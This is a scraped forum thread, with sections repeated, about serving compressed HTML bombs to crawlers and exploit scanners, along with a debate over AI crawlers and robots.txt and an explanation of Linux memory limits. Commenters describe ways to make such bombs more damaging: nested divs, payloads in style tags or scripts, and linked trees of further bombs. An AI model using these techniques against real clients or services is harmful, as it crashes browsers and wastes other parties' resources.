This is the same idea as in the article, just an alternative flavor of generating the zip bomb.
And I actually only serve this to exploit scanners, not LLM crawlers.
I've run a lot of websites for a long time, and I've never seen a legitimate LLM crawler ignore robots.txt. I've seen reports of that, but any time I've had a chance to look into it, it's been one of:
- The site's robots.txt didn't actually say what the author thought they had made it say
- The crawler had nothing to with the crawler it was claiming to be, it just hijacked a user agent to deflect blame
It would be pretty weird, after all, for a company running a crawler to ignore robots.txt with hostile intent while also choosing to accurately ID itself to its victim.
I can imagine the large scale web scrapers just avoid processing comments entirely, so while they may unzip the bomb it could be they just discard the chunks that are inside of a comment. The same trick could be applied to other elements in the HTML though: semicolons in the style tag, some gigantic constant in inline JS, etc. If the HTML itself contained a gigantic tree of links to other zip bombs that could also have an amplifying effect on the bad scraper.
There is definitively improvements that can be made. The comment part is more about aesthetic as it is not needed actually, you could have just put the zip chunk in a `div`, I guess.
For every 1 robots.txt that is genuinly configured, there's 9 that make absolutely no sense at all.
Worse. GETing the robots.txt automatically flags you as a 'bot'!
So as a crawler that wants to respect the spirit of the robots.txt, not the inane letter that your hired cheapest junior webadmin copy/pasted there from some reddit comment, we now have to jump through hoops such as geeting hhe robots.txt from a separate vpn etc.
Well, robots.txt being an opaque and opt out system was broken from the start. I've just started havi g hidden links and pages only mentioned in robots.txt and any ip that tries those is immediatly blocked for 24 hours. There is no reason to continue entertaining these companies.
If you try to do that on a site with Cloudflare, what happens? Do they read the zip file and try to cache the uncompressed content to serve it with the best compression algorithm for a given client, or do they cache the compressed file and serve it "as is"?
If you're doing this through cloudflare, you'll want to add the response header
cache-control: no-transform
so you don't bomb cloudflare when they naturally try to decompress your document, parse it, and recompress it with whatever methods the client prefers.
That being said, you can bomb cloudflare without significant issue. It's probably a huge waste of resources for them, but they correctly handle it. I've never seen cloudflare give up before the end-client does.
Cloudflare has free AI Labyrinths if your goal is to target AI. The bots follow hidden links to a maze of unrelated content, and Cloudflare uses this to identify bots.
https://blog.cloudflare.com/ai-labyrinth/
Perhaps you have very generous limits on RAM allocation per thread. I have 32GB, 128 with swap and still crash (silently on Firefox and with a dedicated screen on Chrome).
Out of curiosity, how do you set these limits? I'm not the person you're replying to, but I'm just using the default limits that ship with Ubuntu 22.04
Usually in /etc/limits.conf. The field `as` for address space will be my guess, but I not sure, maybe `data`. The man page `man limits.conf` isn't very descriptive.
What is `data` ? "maximum data size (KB)". Is `address space limit (KB)` virtual or physical ?
What is maximum filesize in a context of a process ?! I mean what happens if a file is bigger ? Maybe it can't write bigger file than that, maybe it can't execute file bigger than that.
If I were reading the documentation for higher level language APIs, I'd also read the documentation for setting up/using the types that are associated.
With well-written documentation, there's usually related information and/or see-also. Indeed, this has `SEE ALSO` for `getrlimit(2)`, which is equivalent to `man 2 getrlimit` [0].
From there, the things are a bit more descriptive.
RLIMIT_AS
This is the maximum size of the process's virtual memory
(address space). The limit is specified in bytes, and is
rounded down to the system page size. This limit affects
calls to brk(2), mmap(2), and mremap(2), which fail with
the error ENOMEM upon exceeding this limit. In addition,
automatic stack expansion fails (and generates a SIGSEGV
that kills the process if no alternate stack has been made
available via sigaltstack(2)). Since the value is a long,
on machines with a 32-bit long either this limit is at most
2 GiB, or this resource is unlimited.
RLIMIT_DATA
This is the maximum size of the process's data segment
(initialized data, uninitialized data, and heap). The
limit is specified in bytes, and is rounded down to the
system page size. This limit affects calls to brk(2),
sbrk(2), and (since Linux 4.7) mmap(2), which fail with the
error ENOMEM upon encountering the soft limit of this
resource.
The documentation also links to the affected system calls (`brk` [1], `sbrk` [1], `mmap` [2], `mremap` [3], and `signalstack`). Note that all of this is in section 2 and 3 of the manual for system interface calls and libraries that interact with the system. You might find some installations of linux complaining about missing documentation (eg minimalized containers and/or release distros -- documentation takes up a decent chunk of disk space and isn't generally needed outside of a developer's workstation), in which case the most likely reason is that the documentation package should be re/installed via your package manager.
So,
> What is `data` ? "maximum data size (KB)".
"data" is the process's data segment [1]. Perhaps this might be clearer, but it is fairly well defined if you then read the documentation for `brk` [1]:
brk() and sbrk() change the location of the program break, which
defines the end of the process's data segment (i.e., the program
break is the first location after the end of the uninitialized
data segment). Increasing the program break has the effect of
allocating memory to the process; decreasing the break deallocates
memory.
This rabbit hole goes into describing system internals for process memory layouts [5] and it can expand pretty widely into understanding how's and why's. This level of system knowledge is literally understanding your operating system and... it's IMO well documented if you just keep searching terms that you're unfamiliar with; instead of `man` you might try `apropos` (and see `man apropos`). You'll end up exploring a huge chunk of the C-language system API, and a fair bit of glibc too.
Then,
> Is `address space limit (KB)` virtual or physical ?
First sentence of the C-language documentation for RLIMIT_AS:
RLIMIT_AS
This is the maximum size of the process's virtual memory
(address space).
> What is maximum filesize in a context of a process ?!
System API `open()`, `opendir()`, `openat()`, [6] etc with _system file descriptors_? Well assuming your _file descriptor_ points to a file, then it's whatever the filesystem supports. But your system generally can support 32-bit-or-64-bit (depending on macros usually defined during kernel compilation) with `lseek` [7] and `off_t` [8], or you can force 64-bit bit support with `lseek64` [9] and `off64_t` [8], and fail to compile your app if your kernel wasn't compiled with 64-bit support.
It's more complicated if you use a different API (such as C's FILE* functions [10] or etc).
> what happens if a file is bigger?
I'm not sure -- I've never had to worry about it because I use the 64-bit APIs. You could try mounting a filesystem supporting 64-bit files, then write a file beyond 32-bits, then boot into a 32-bit OS and try mounting it and reading the file. You'll probably get an error code that you can then look up in the documentation. If it's not clear what it is, then the kernel source code is fairly easy to navigate to find where the error could come from and what it might mean, and I've done it for mremap failures.
> Maybe it can't write bigger file than that, maybe it can't execute file bigger than that.
That heavily depends on system architecture and your operating system support. But unless I'm mistaken with Linux on x86_64, just about any user-land virtual address page can be marked executable; but it's different in kernel-land with reserved/register/io address space.
And, as I understand it, the kernel memory-maps your executable from your filesystem. So, generally, user-land code can map to "anywhere" (this is good for ASLR safety) and could be executed even with minimal physical address space available. But in practice, your executable is mapped to within a certain region of the virtual address space, which leaves the other region of your address space available for allocations (this is how `brk` works). What's generally far more important is how much memory you might allocate during your program's lifecycle, and whether or not you end up fragmenting that memory.
In any case, the documentation for `/etc/security/limits.conf` (linked earlier) states:
If a hard limit or soft limit of a resource is set to a valid
value, but outside of the supported range of the local system, the
system may reject the new limit or unexpected behavior may occur.
If the control value required is used, the module will reject the
login if a limit could not be set.
If you set your limits so low that you can't start processes because you run out of address space while trying to load them, then that might be classified as "unexpected behavior" if you didn't expect that to happen and so is... well documented. I don't see where it says anything about "valid value" or "supported range" for specific limits, but for those I would just poke around the kernel source code [11] where those C macros are used and look for limits around them. `grep -nR` [12] is what I'd use for that.
Try creating one with deeply nested tags. Recursively adding more nodes via scripting is another memory waster. From there you might consider additional changes to the CSS that cause the document to repaint.
It will also compress worse, making it less like a zip bomb and more like a huge document. Nothing against that, but the article's trick is just to stop a parser to bail early.
Neat approach. I make my anti-crawler HTML zip bombs like this:
So they're just billions of nested div tags. Compresses just as well as repeated-single-character bombs in my experience.This is a great idea.
LLM crawlers are ignoring robots.txt, breaching site terms of service, and ingesting copyrighted data for training without a licence.
We need more ideas like this!
This is the same idea as in the article, just an alternative flavor of generating the zip bomb.
And I actually only serve this to exploit scanners, not LLM crawlers.
I've run a lot of websites for a long time, and I've never seen a legitimate LLM crawler ignore robots.txt. I've seen reports of that, but any time I've had a chance to look into it, it's been one of:
- The site's robots.txt didn't actually say what the author thought they had made it say
- The crawler had nothing to with the crawler it was claiming to be, it just hijacked a user agent to deflect blame
It would be pretty weird, after all, for a company running a crawler to ignore robots.txt with hostile intent while also choosing to accurately ID itself to its victim.
Perplexity certainly was ignoring robots.txt [0]
Anthropic... Their robots.txt requires a delay to be defined, even though its an optional extension. But whatever.
[0] https://www.wired.com/story/perplexity-is-a-bullshit-machine...
There's plenty of evidence to the contrary;
https://mjtsai.com/blog/2024/06/24/ai-companies-ignoring-rob...
Nice command line.
Note: the submission link is not the zip bomb. It’s safe to click.
Sounds like something a person linking to a zip bomb would say :-D
I can imagine the large scale web scrapers just avoid processing comments entirely, so while they may unzip the bomb it could be they just discard the chunks that are inside of a comment. The same trick could be applied to other elements in the HTML though: semicolons in the style tag, some gigantic constant in inline JS, etc. If the HTML itself contained a gigantic tree of links to other zip bombs that could also have an amplifying effect on the bad scraper.
There is definitively improvements that can be made. The comment part is more about aesthetic as it is not needed actually, you could have just put the zip chunk in a `div`, I guess.
For every 1 robots.txt that is genuinly configured, there's 9 that make absolutely no sense at all.
Worse. GETing the robots.txt automatically flags you as a 'bot'!
So as a crawler that wants to respect the spirit of the robots.txt, not the inane letter that your hired cheapest junior webadmin copy/pasted there from some reddit comment, we now have to jump through hoops such as geeting hhe robots.txt from a separate vpn etc.
Well, robots.txt being an opaque and opt out system was broken from the start. I've just started havi g hidden links and pages only mentioned in robots.txt and any ip that tries those is immediatly blocked for 24 hours. There is no reason to continue entertaining these companies.
If you try to do that on a site with Cloudflare, what happens? Do they read the zip file and try to cache the uncompressed content to serve it with the best compression algorithm for a given client, or do they cache the compressed file and serve it "as is"?
If you're doing this through cloudflare, you'll want to add the response header
so you don't bomb cloudflare when they naturally try to decompress your document, parse it, and recompress it with whatever methods the client prefers.That being said, you can bomb cloudflare without significant issue. It's probably a huge waste of resources for them, but they correctly handle it. I've never seen cloudflare give up before the end-client does.
Cloudflare has free AI Labyrinths if your goal is to target AI. The bots follow hidden links to a maze of unrelated content, and Cloudflare uses this to identify bots. https://blog.cloudflare.com/ai-labyrinth/
Do you think Meta AI's llama 4 failed so badly cause they ended up crawling a bunch of labrynths?
I dislike that the websites sidebar all of sudden collapses during scrolling, it shifts all the content to the left in middle of reading
That content shift on page scroll is horrendous. Please don't do that, there is no need to auto hide a side bar.
Safari 18.5 (macOS) throws an error WebKitErrorDomain: 300.
Crashing Safari on iOS (not technically crashing the whole app, but the tab displays internal WebKit error).
Crashed 1password on safari haha
Risky click
Did not crash Firefox nor Chrome for me on Linux.
Perhaps you have very generous limits on RAM allocation per thread. I have 32GB, 128 with swap and still crash (silently on Firefox and with a dedicated screen on Chrome).
Out of curiosity, how do you set these limits? I'm not the person you're replying to, but I'm just using the default limits that ship with Ubuntu 22.04
Usually in /etc/limits.conf. The field `as` for address space will be my guess, but I not sure, maybe `data`. The man page `man limits.conf` isn't very descriptive.
> The man page `man limits.conf` isn't very descriptive.
Looks to me like it's quite descriptive. What information do you think is missing?
https://www.man7.org/linux/man-pages/man5/limits.conf.5.html
What is `data` ? "maximum data size (KB)". Is `address space limit (KB)` virtual or physical ?
What is maximum filesize in a context of a process ?! I mean what happens if a file is bigger ? Maybe it can't write bigger file than that, maybe it can't execute file bigger than that.
I have a bunch of questions.
> I have a bunch of questions.
If I were reading the documentation for higher level language APIs, I'd also read the documentation for setting up/using the types that are associated.
With well-written documentation, there's usually related information and/or see-also. Indeed, this has `SEE ALSO` for `getrlimit(2)`, which is equivalent to `man 2 getrlimit` [0].
From there, the things are a bit more descriptive.
The documentation also links to the affected system calls (`brk` [1], `sbrk` [1], `mmap` [2], `mremap` [3], and `signalstack`). Note that all of this is in section 2 and 3 of the manual for system interface calls and libraries that interact with the system. You might find some installations of linux complaining about missing documentation (eg minimalized containers and/or release distros -- documentation takes up a decent chunk of disk space and isn't generally needed outside of a developer's workstation), in which case the most likely reason is that the documentation package should be re/installed via your package manager.So,
> What is `data` ? "maximum data size (KB)".
"data" is the process's data segment [1]. Perhaps this might be clearer, but it is fairly well defined if you then read the documentation for `brk` [1]:
This rabbit hole goes into describing system internals for process memory layouts [5] and it can expand pretty widely into understanding how's and why's. This level of system knowledge is literally understanding your operating system and... it's IMO well documented if you just keep searching terms that you're unfamiliar with; instead of `man` you might try `apropos` (and see `man apropos`). You'll end up exploring a huge chunk of the C-language system API, and a fair bit of glibc too.Then,
> Is `address space limit (KB)` virtual or physical ?
First sentence of the C-language documentation for RLIMIT_AS:
> What is maximum filesize in a context of a process ?!System API `open()`, `opendir()`, `openat()`, [6] etc with _system file descriptors_? Well assuming your _file descriptor_ points to a file, then it's whatever the filesystem supports. But your system generally can support 32-bit-or-64-bit (depending on macros usually defined during kernel compilation) with `lseek` [7] and `off_t` [8], or you can force 64-bit bit support with `lseek64` [9] and `off64_t` [8], and fail to compile your app if your kernel wasn't compiled with 64-bit support.
It's more complicated if you use a different API (such as C's FILE* functions [10] or etc).
> what happens if a file is bigger?
I'm not sure -- I've never had to worry about it because I use the 64-bit APIs. You could try mounting a filesystem supporting 64-bit files, then write a file beyond 32-bits, then boot into a 32-bit OS and try mounting it and reading the file. You'll probably get an error code that you can then look up in the documentation. If it's not clear what it is, then the kernel source code is fairly easy to navigate to find where the error could come from and what it might mean, and I've done it for mremap failures.
> Maybe it can't write bigger file than that, maybe it can't execute file bigger than that.
That heavily depends on system architecture and your operating system support. But unless I'm mistaken with Linux on x86_64, just about any user-land virtual address page can be marked executable; but it's different in kernel-land with reserved/register/io address space.
And, as I understand it, the kernel memory-maps your executable from your filesystem. So, generally, user-land code can map to "anywhere" (this is good for ASLR safety) and could be executed even with minimal physical address space available. But in practice, your executable is mapped to within a certain region of the virtual address space, which leaves the other region of your address space available for allocations (this is how `brk` works). What's generally far more important is how much memory you might allocate during your program's lifecycle, and whether or not you end up fragmenting that memory.
In any case, the documentation for `/etc/security/limits.conf` (linked earlier) states:
If you set your limits so low that you can't start processes because you run out of address space while trying to load them, then that might be classified as "unexpected behavior" if you didn't expect that to happen and so is... well documented. I don't see where it says anything about "valid value" or "supported range" for specific limits, but for those I would just poke around the kernel source code [11] where those C macros are used and look for limits around them. `grep -nR` [12] is what I'd use for that.That's enough rabbit hole for me.
[0]: https://www.man7.org/linux/man-pages/man2/getrlimit.2.html
[1]: https://www.man7.org/linux/man-pages/man2/brk.2.html
[2]: https://www.man7.org/linux/man-pages/man2/mmap.2.html
[3]: https://www.man7.org/linux/man-pages/man2/mremap.2.html
[4]: https://www.man7.org/linux/man-pages/man2/sigaltstack.2.html
[5]: https://en.wikipedia.org/wiki/Executable_and_Linkable_Format
[6]: https://man7.org/linux/man-pages/man2/open.2.html
[7]: https://man7.org/linux/man-pages/man2/lseek.2.html
[8]: https://man7.org/linux/man-pages/man3/off64_t.3type.html
[9]: https://man7.org/linux/man-pages/man3/lseek64.3.html
[10]: https://man7.org/linux/man-pages/man3/file.3type.html
[11]: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/lin...
[12]: https://man7.org/linux/man-pages/man1/grep.1.html
Crashed Chrome tab on Windows instantly but Firefox is fine. It shows loading but pressing Ctrl + U even shows the very start of that fake HTML.
Try creating one with deeply nested tags. Recursively adding more nodes via scripting is another memory waster. From there you might consider additional changes to the CSS that cause the document to repaint.
It will also compress worse, making it less like a zip bomb and more like a huge document. Nothing against that, but the article's trick is just to stop a parser to bail early.
For my usage, the compressed size difference with deeply nested divs was negligible.
It crashed the tab in Brave on Android for me.
It crashed the tab on Vivaldi (Linux).
Imagine you‘re a crawler operator. Do you really have a problem with documents like this? I don’t think so.
Related:
Fun with gzip bombs and email clients
https://news.ycombinator.com/item?id=44651536